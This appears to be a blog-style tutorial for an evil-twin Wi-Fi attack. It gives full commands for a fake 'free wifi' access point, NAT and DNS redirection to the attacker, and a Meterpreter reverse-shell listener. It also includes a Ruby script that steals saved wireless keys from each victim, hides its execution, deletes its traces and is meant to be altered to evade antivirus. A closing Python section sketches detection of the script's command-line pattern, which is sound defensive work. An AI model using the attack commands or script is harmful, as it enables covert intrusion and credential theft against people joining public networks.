Wireless key harvester
First we create our Meterpreter executable. For how to build one with msfpayload, see this page:
http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html
Then set up our listener (the AutoRunScript runs the harvester script below on every new session):
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
set AutoRunScript /home/hm/Desktop/http/wirelesskeyharvester.rb
set ExitOnSession false
show options
exploit -j
Next, set up our fake access point (airbase-ng creates the at0 interface used below):
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v
Now we set up our DHCP server and the NAT rules that redirect all UDP and port 80 TCP traffic to ourselves:
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
Set up a web server (lighttpd here) to host our exploit:
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'
DNS redirector, in this case dnspoison:
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1
And that's it: wait for victims to connect, or forcefully disconnect them using mdk.
--------------------------- harvester.rb ---------------------------------------
#
# Wireless key harvester using Wireless Key Viewer (wkv.exe)
#
# Meterpreter AutoRunScript: runs automatically on every new session.
require 'rex'

# Extract the host and port of the new session
host, port = session.tunnel_peer.split(':')
print_status("New session found on #{host}:#{port}...")

# Meterpreter's file API does not expand environment variables itself, so
# resolve %SystemDrive% on the target (cmd.exe expands it on its own below)
sysdrive = client.fs.file.expand_path("%SystemDrive%")

# bin -- the name of our exe on the target
bin = "wkv.exe"
# out -- randomly named output file of Wireless Key Viewer
out = Rex::Text.rand_text_alpha_upper(5) + ".txt"
# dest -- local folder that receives the keys in text format
dest = "/home/hm/Desktop/keys/"

# upload Wireless Key Viewer --- modify it to bypass AVs
print_status("Uploading Wireless Key Viewer")
client.fs.file.upload_file("#{sysdrive}\\#{bin}", "/home/hm/Desktop/http/wkv.exe")
print_status("Uploaded Wireless Key Viewer")
sleep(1)

# execute via cmd.exe; /stabular writes the keys as a tab-delimited table
# into the randomly named file in the root of the system drive
print_status("Executing Wireless Key Viewer")
client.sys.process.execute("cmd.exe /c %SystemDrive%\\#{bin} /stabular %SystemDrive%\\#{out}", nil, {'Hidden' => true})
print_status("Wireless Key Viewer executed")
# execute() returns immediately, so give the tool a moment to write its output
sleep(5)

# download the keys to our keys folder
print_status("Downloading keys to keys folder")
client.fs.file.download_file("#{dest}#{out}", "#{sysdrive}\\#{out}")
print_status("Downloaded keys to keys folder")

# delete the uploaded files -- we can also clear logs here if we want to
sleep(1)
print_status("Deleting uploaded files")
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin}", nil, {'Hidden' => true})
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out}", nil, {'Hidden' => true})
print_status("Have a nice day!!!!!!")
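From the defender's side, the script above leaves a recognisable shape in process-creation telemetry: cmd.exe launching an executable from the root of the system drive, the /stabular export switch, an output file named by five upper-case letters, and a del of both files shortly after. The Python below is an added example, not code from the original post: it scores constructed Sysmon-style command lines for that shape and ties a later del back to a file launched or written earlier. The flattened key=value|... log layout and the indicator weights are assumptions.

```python
import re
from typing import Dict, List, Set

# Constructed Sysmon-style (Event ID 1) records, one per line, flattened as
# "key=value|key=value"; this layout is an assumption, real telemetry differs.
SAMPLE_LOG = """\
ts=10:00:01|CommandLine=cmd.exe /c C:\\wkv.exe /stabular /QWERT.txt
ts=10:00:03|CommandLine=cmd.exe /c del C:\\wkv.exe
ts=10:00:03|CommandLine=cmd.exe /c del C:\\QWERT.txt
ts=10:05:00|CommandLine=cmd.exe /c dir C:\\Users
ts=10:06:00|CommandLine=cmd.exe /c C:\\Tools\\backup.exe /quiet
"""

# One indicator per feature of the harvester's command lines. None keys on the
# file name wkv.exe, which is trivially renamed; the shape is what persists.
CMD_C = r"^\s*cmd\.exe\s+/c\s+"
ROOT_EXE = re.compile(CMD_C + r"[A-Za-z]:\\([^\\\s]+\.exe)\b", re.I)  # exe run from drive root
ROOT_DEL = re.compile(CMD_C + r"del\s+[A-Za-z]:\\([^\\\s]+)", re.I)   # file deleted from drive root
EXPORT_SWITCH = re.compile(r"\s/stabular\b", re.I)                     # WirelessKeyView export switch
RANDOM_OUT = re.compile(r"[\s/\\]([A-Z]{5}\.txt)\b")                   # rand_text_alpha_upper(5) + ".txt"
WEIGHTS = {"root_exe": 2, "export_switch": 2, "random_out": 1,
           "root_del": 1, "cleanup_of_dropped_file": 2}

def score(cmd: str, dropped: Set[str]) -> Dict[str, int]:
    """Indicators matched by one command line. `dropped` accumulates base names
    of files launched or written earlier so a later del of them can be tied back."""
    hits: Dict[str, int] = {}
    if m := ROOT_EXE.match(cmd):
        hits["root_exe"] = WEIGHTS["root_exe"]
        dropped.add(m.group(1).lower())
    if EXPORT_SWITCH.search(cmd):
        hits["export_switch"] = WEIGHTS["export_switch"]
    if m := RANDOM_OUT.search(cmd):
        hits["random_out"] = WEIGHTS["random_out"]
        dropped.add(m.group(1).lower())
    if m := ROOT_DEL.match(cmd):
        hits["root_del"] = WEIGHTS["root_del"]
        if m.group(1).lower() in dropped:
            hits["cleanup_of_dropped_file"] = WEIGHTS["cleanup_of_dropped_file"]
    return hits

def scan(log_text: str, threshold: int = 3) -> List[dict]:
    """One alert per record whose summed indicator weight reaches threshold."""
    dropped, alerts = set(), []
    for line in log_text.splitlines():
        rec = dict(kv.split("=", 1) for kv in line.split("|"))  # flattened record -> fields
        hits = score(rec.get("CommandLine", ""), dropped)
        if sum(hits.values()) >= threshold:
            alerts.append({"ts": rec["ts"], "score": sum(hits.values()), "indicators": sorted(hits)})
    return alerts
```

The export switch and the root-of-drive executable each score 2, so a single run of the tool alerts on its own, while the later del lines only alert because they are correlated with the earlier drop.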